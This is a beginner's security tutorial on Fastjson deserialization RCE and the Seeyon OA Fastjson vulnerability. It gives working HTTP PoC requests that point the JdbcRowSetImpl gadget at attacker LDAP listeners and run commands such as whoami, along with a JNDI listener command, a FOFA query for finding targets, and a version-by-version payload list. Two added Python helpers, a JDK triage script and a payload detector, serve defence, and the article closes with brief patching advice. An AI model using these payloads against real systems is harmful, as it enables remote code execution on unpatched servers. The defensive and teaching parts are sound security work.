Fastjson Deserialization and the Seeyon OA Fastjson Vulnerability

I entered the cybersecurity industry in 2021. As a security beginner, I am sharing some self-study tutorials with everyone, hoping that while I organize what I already know into a system it can also help fellow bloggers. The content is fairly basic and draws on many experts' articles; if it is not to your taste, please do not flame me, thanks! If the article helps you, that is the greatest motivation for my writing!
This article mainly draws on the latest article from 雷神众测.

Vulnerability details
FastJson is an open-source library from Alibaba, used mainly to parse and serialize data in JSON format. The commonly exploitable RCE-affected version ranges run from <1.2.24 to <1.2.47 and on to <1.2.68, and so on.
Tools used
Run the following command on a VPS to listen on a port and set the local IP; on a VPS or cloud server this can usually be set directly to 0.0.0.0.

java -jar JNDI.jar -i 0.0.0.0 -l 1389

POC

POST 路径 HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
cmd: whoami
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 208
{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://x.x.x.x:1399/TomcatBypass/TomcatEcho","autoCommit":true}}

[Image 1]

Seeyon OA Fastjson vulnerability

Seeyon OA also uses this open-source library, so a vulnerability was recently disclosed.
Affected scope
FOFA:“seeyon” && region=“xxxx” && after=“2021-01-01”

V7.1、V7.1SP1
V7.0、V7.0SP1、V7.0SP2、V7.0SP3
V6.1、V6.1SP1、V6.1SP2
V6.0、V6.0SP1
V5.6、V5.6SP1

POC

POST /seeyon/main.do?method=changeLocale HTTP/1.1
Host: 10.1.2.87
Content-Length: 221
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
cmd: ipconfig
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: JSESSIONID=26FF8158707BB0896A3ACD66EB92DD41; loginPageURL=
Connection: close

_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://xx.xxx.xxx.xxx:1289/TomcatBypass/TomcatEcho","autoCommit":true}}

Vulnerability reproduction

Vulnerability detection

JNDI affected scope:
1. RMI vector: applies to JDK versions before JDK 6u132, JDK 7u122 and JDK 8u113
2. LDAP vector: applies to JDK versions before JDK 11.0.1, 8u191, 7u201 and 6u211
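The two JDK thresholds above decide whether a JNDI lookup of an attacker-supplied name can pull a class from a remote codebase by default. The following Python helper is an added example (not from the original article, 雷神众测 or Seeyon): it normalises the three common spellings of a JDK version and checks a constructed host inventory against the article's RMI and LDAP thresholds, so a defender can tell which hosts still have the permissive default. The inventory hostnames and version strings are constructed, and JDK majors the article's table does not list (9, 10, 17 and so on) are reported as "not covered" rather than guessed.

```python
import re
from typing import Optional, Tuple

# Fix thresholds taken from the article above. Builds older than these still
# default com.sun.jndi.{rmi,ldap}.object.trustURLCodebase to true, so a JNDI
# lookup of an attacker-controlled name may load a remote class.
# Majors not listed here are reported as "not covered" rather than guessed.
RMI_FIX = {6: (6, 0, 132), 7: (7, 0, 122), 8: (8, 0, 113)}
LDAP_FIX = {6: (6, 0, 211), 7: (7, 0, 201), 8: (8, 0, 191), 11: (11, 0, 1)}

_LEGACY = re.compile(r"^1\.(\d+)\.(\d+)(?:_(\d+))?")      # 1.8.0_191
_SHORT = re.compile(r"^(\d+)u(\d+)")                       # 8u191
_MODERN = re.compile(r"^(\d+)(?:\.(\d+))?(?:\.(\d+))?")    # 11.0.1


def parse_jdk(version: str) -> Tuple[int, int, int]:
    """Normalise the three common JDK version spellings to (major, minor, update)."""
    v = version.strip()
    m = _LEGACY.match(v)
    if m:
        return int(m.group(1)), int(m.group(2)), int(m.group(3) or 0)
    m = _SHORT.match(v)
    if m:
        return int(m.group(1)), 0, int(m.group(2))
    m = _MODERN.match(v)
    if m:
        return int(m.group(1)), int(m.group(2) or 0), int(m.group(3) or 0)
    raise ValueError(f"unrecognised JDK version: {version!r}")


def codebase_exposed(version: str, protocol: str) -> Optional[bool]:
    """True  -> build predates the fix for this protocol (remote codebase trusted by default)
    False -> build includes the fix
    None  -> major version not covered by the article's table"""
    table = {"rmi": RMI_FIX, "ldap": LDAP_FIX}[protocol]
    parsed = parse_jdk(version)
    fix = table.get(parsed[0])
    if fix is None:
        return None
    return parsed < fix


def triage(inventory):
    """Constructed helper: label each host by its worst exposure across both vectors."""
    report = {}
    for host, version in inventory.items():
        rmi = codebase_exposed(version, "rmi")
        ldap = codebase_exposed(version, "ldap")
        if rmi or ldap:
            status = "patch JDK: default-trust codebase still on"
        elif rmi is None and ldap is None:
            status = "not in table: verify manually"
        else:
            status = "JDK default is safe; still fix fastjson itself"
        report[host] = {"rmi": rmi, "ldap": ldap, "status": status}
    return report


# Constructed sample inventory (placeholder hostnames, not real systems).
SAMPLE_INVENTORY = {
    "oa-app-01": "1.8.0_181",
    "oa-app-02": "1.8.0_191",
    "oa-app-03": "8u112",
    "oa-app-04": "11.0.1",
    "oa-app-05": "17.0.2",
}

if __name__ == "__main__":
    for host, row in triage(SAMPLE_INVENTORY).items():
        print(f"{host}: rmi_exposed={row['rmi']} ldap_exposed={row['ldap']} -> {row['status']}")
```

A JDK at or past the threshold only closes the remote-codebase path; the JSON parser still instantiates whatever class the payload names, so the status string deliberately keeps "fix fastjson itself" even for patched hosts, matching the article's own remediation advice.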

PoCs that raise no error

{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:"x"}}
{"x":{"@type":"com.alibaba.fastjson.JSONObject", {"@type": "java.net.URL", "val":"http://dnslog"}}""}}

Raises an error, but still effective

{"x":{"@type":"java.net.Inet4Address","val":"dnslog"}}
{"x":{"@type":"java.net.Inet6Address","val":"dnslog"}}
{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}]}

Raises an error and returns 400, but still effective

{"x":Set[{"@type":"java.net.URL","val":"http://dnslog"}}
{"x":{{"@type":"java.net.URL","val":"http://dnslog"}:0}

Fastjson timeline and PoCs

fastjson<=1.2.24(CNVD-2017-02833)

{"v24":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.41

{"v41":{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.42

{"v42":{"@type":"LLcom.sun.rowset.JdbcRowSetImpl;;","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.43

{"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://0.0.0.0","autoCommit":true]}}}

fastjson<=1.2.45

{"v45":{"@type":"java.lang.Class","val":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"},"xxx":{"@type":"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory","properties":{"data_source":"ldap://0.0.0.0"}}}

fastjson<=1.2.47(CNVD-2019-22238)

{"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://0.0.0.0","autoCommit":true}}

fastjson<=1.2.59

{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://127.0.0.1"}}
{"v59_error":{"@type":"com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://127.0.0.1"}}

fastjson<=1.2.61

{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"rmi://127.0.0.1"}}

{"v61_error":{"@type":"org.apache.commons.proxy.provider.remoting.SessionBeanProvider","jndiName":"ldap://127.0.0.1","Object":"a"}}

fastjson<=1.2.62

{"v62":{"@type":"org.apache.xbean.propertyeditor.JndiConverter","asText":"ldap://0.0.0.0"}}
{"v62_error":{"@type":"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig","properties": {"@type":"java.util.Properties","UserTransaction":"ldap://0.0.0.0"}}}
{"v62_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","healthCheckRegistry":"ldap://0.0.0.0"}}
{"v62_error":{"@type":"org.apache.cocoon.components.slide.impl.JMSContentInterceptor","parameters": {"@type":"java.util.Hashtable","java.naming.factory.initial":"com.sun.jndi.rmi.registry.RegistryContextFactory","topic-factory":"ldap://0.0.0.0"},"namespace":""}}

fastjson<=1.2.66

{"v66":{"@type":"org.apache.shiro.realm.jndi.JndiRealmFactory","jndiNames":["ldap://0.0.0.0"],"Realms":[""]}}
{"v66":{"@type":"org.apache.shiro.jndi.JndiObjectFactory","resourceName":"ldap://0.0.0.0"}}

{"v66_error":{"@type":"br.com.anteros.dbcp.AnterosDBCPConfig","metricRegistry":"ldap://0.0.0.0"}}
{"v66_error":{"@type":"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup","jndiNames":"ldap://0.0.0.0"}}

fastjson<=1.2.68

File-write overwrite method

{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","metricRegistry":"ldap://0.0.0.0"}
{"@type":"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig","healthCheckRegistry":"ldap://0.0.0.0"}
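The probe payloads in the detection section and the version-by-version PoCs above all share one trait a defender can key on: an `@type` key (or a `java.lang.Class` + `val` pair) naming a JNDI-capable class, sometimes spelled with the `L...;`, `LL...;;` or `[` descriptor tricks. The request-inspection routine below is an added example, not code from the original article, 雷神众测 or Seeyon: it pulls the JSON out of a raw request (including the form-encoded `_json_params=` shape used against the Seeyon endpoint), normalises the class names, and classifies the request as block, alert or allow. The gadget list is constructed from the PoCs on this page, the sample requests are constructed, and listener addresses are placeholders.

```python
import re
import urllib.parse
from typing import Dict

# Gadget classes collected from the PoCs listed above (constructed list; extend it
# from your own gadget inventory).
GADGET_CLASSES = {
    "com.sun.rowset.JdbcRowSetImpl",
    "org.apache.ibatis.datasource.jndi.JndiDataSourceFactory",
    "com.zaxxer.hikari.HikariConfig",
    "org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig",
    "org.apache.commons.proxy.provider.remoting.SessionBeanProvider",
    "org.apache.xbean.propertyeditor.JndiConverter",
    "com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig",
    "br.com.anteros.dbcp.AnterosDBCPConfig",
    "org.apache.cocoon.components.slide.impl.JMSContentInterceptor",
    "org.apache.shiro.realm.jndi.JndiRealmFactory",
    "org.apache.shiro.jndi.JndiObjectFactory",
    "org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup",
}
# Classes used by the dnslog probes above: they trigger an outbound lookup but run no gadget.
PROBE_CLASSES = {"java.net.InetSocketAddress", "java.net.Inet4Address",
                 "java.net.Inet6Address", "java.net.URL"}

_TYPE_RE = re.compile(r'"@type"\s*:\s*"([^"]+)"')
_VAL_RE = re.compile(r'"val"\s*:\s*"([^"]+)"')          # java.lang.Class + val trick (<=1.2.47)
_JNDI_RE = re.compile(r'(?:ldaps?|rmi)://[^"\s]+', re.IGNORECASE)


def normalize_type(raw: str) -> str:
    """Undo the descriptor spellings from the 1.2.41-1.2.43 bypasses:
    'Lcom.x.Y;', 'LLcom.x.Y;;' and '[com.x.Y' all resolve to com.x.Y."""
    t = raw.strip()
    while t.startswith("["):
        t = t[1:]
    while t.startswith("L") and t.endswith(";"):
        t = t[1:-1]
    return t


def extract_json_body(raw_request: str) -> str:
    """Return the JSON-bearing body of a raw HTTP request, decoding the
    application/x-www-form-urlencoded `_json_params=` shape used above."""
    sep = "\r\n\r\n" if "\r\n\r\n" in raw_request else "\n\n"
    body = raw_request.split(sep, 1)[1] if sep in raw_request else raw_request
    body = body.strip()
    if body.startswith(("{", "[")):
        return body
    fields = urllib.parse.parse_qs(body, keep_blank_values=True)
    return "\n".join(v for values in fields.values() for v in values)


def analyse(raw_request: str) -> Dict[str, object]:
    """Classify one request: block on a known gadget, alert on any @type or
    probe class, allow otherwise. Regex-based on purpose: several of the probe
    payloads above are not valid JSON and json.loads would reject them."""
    body = extract_json_body(raw_request)
    names = {normalize_type(n) for n in _TYPE_RE.findall(body) + _VAL_RE.findall(body)}
    gadgets = sorted(names & GADGET_CLASSES)
    probes = sorted(names & PROBE_CLASSES)
    uses_autotype = "@type" in body
    if gadgets:
        verdict = "block"
    elif uses_autotype or probes:
        verdict = "alert"
    else:
        verdict = "allow"
    return {"verdict": verdict, "gadgets": gadgets, "probes": probes,
            "autotype": uses_autotype, "jndi_urls": _JNDI_RE.findall(body)}


# Constructed sample traffic; hostnames and listener addresses are placeholders.
SAMPLE_SEEYON = (
    "POST /seeyon/main.do?method=changeLocale HTTP/1.1\r\n"
    "Host: oa.example.internal\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n\r\n"
    '_json_params={"v47":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},'
    '"xxx":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://LISTENER-PLACEHOLDER:1389/x","autoCommit":true}}'
)
SAMPLE_V43 = '{"v43":{"@type":"[com.sun.rowset.JdbcRowSetImpl"[{"dataSourceName":"ldap://LISTENER-PLACEHOLDER","autoCommit":true]}}}'
SAMPLE_PROBE = '{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"dnslog"}}}'
SAMPLE_BENIGN = '{"user":"alice","locale":"zh_CN"}'

if __name__ == "__main__":
    for label, req in [("seeyon", SAMPLE_SEEYON), ("v43", SAMPLE_V43),
                       ("probe", SAMPLE_PROBE), ("benign", SAMPLE_BENIGN)]:
        print(label, analyse(req))
```

Any `@type` only raises an alert rather than a block because some applications legitimately rely on autoType; the block verdict is reserved for the gadget list. Inspection like this is a compensating control for the window before the upgrade the article recommends, not a replacement for it, since the list only covers gadgets already known.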

Field notes

Prepare on your own: JNDI-Injection-Exploit

(https://github.com/welk1n/JNDI-Injection-Exploit)

Its usage is not covered further here.
Initial probing with dnslog

[Image 2]

Probing for command execution

[Image 3]

An incoming request shows that the ping command executed successfully

[Image 4]

Getting output echoed back

[Image 5]

Remediation suggestions

1. Upgrade the fastjson component to the latest version
2. Upgrade the OA system
